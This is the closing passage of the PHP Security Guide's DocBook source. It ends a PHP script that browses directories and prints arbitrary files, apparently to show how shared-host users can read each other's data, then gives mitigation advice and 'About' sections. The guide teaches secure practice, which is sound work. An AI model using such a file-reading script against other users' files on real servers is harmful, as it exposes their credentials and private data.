                $line .= "<a href=\"{$_SERVER['PHP_SELF']}?file=$dir$filename\">$filename</a>";
            }
            else
            {
                $line = str_pad($size, 15);
                $line .= $filename;
            }
        }

        echo "$line\n";
    }

    $handle->close();
}

function cat($file)
{
    ob_start();
    readfile($file);
    $contents = ob_get_clean();
    echo htmlentities($contents);

    return true;
}

?>]]>
</programlisting>
<para>The <literal>safe_mode</literal> directive can prevent this particular
script from working, but what about one written in another language?</para>
<para>A good solution is to store sensitive data in a database and use the
technique mentioned earlier (where <literal>$_SERVER['DB_USER']</literal> and
<literal>$_SERVER['DB_PASS']</literal> contain the access credentials) to
protect your database access credentials.</para>
<para>The best solution is to use a dedicated host.</para>
</sect1>
</chapter>

<chapter id="ABOUT">
<title>About</title>

<sect1 id="ABOUT-THIS-GUIDE">
<title>About This Guide</title>
<para>The PHP Security Guide is a project of the PHP Security Consortium. You
can always find the latest version of the Guide at
<systemitem role="url">http://phpsec.org/projects/guide/</systemitem>.</para>
</sect1>

<sect1 id="ABOUT-THE-PHP-SECURITY-CONSORTIUM">
<title>About the PHP Security Consortium</title>
<para>The mission of the PHP Security Consortium (PHPSC) is to promote secure
programming practices within the PHP community through education and exposition
while maintaining high ethical standards.</para>
<para>Learn more about the Consortium at
<systemitem role="url">http://phpsec.org/</systemitem>.</para>
</sect1>

<sect1 id="MORE-INFORMATION">
<title>More Information</title>
<para>For more information on PHP security practices, visit the PHP Security
Consortium Library at
<systemitem role="url">http://phpsec.org/library/</systemitem>.</para>
</sect1>
</chapter>
</book>
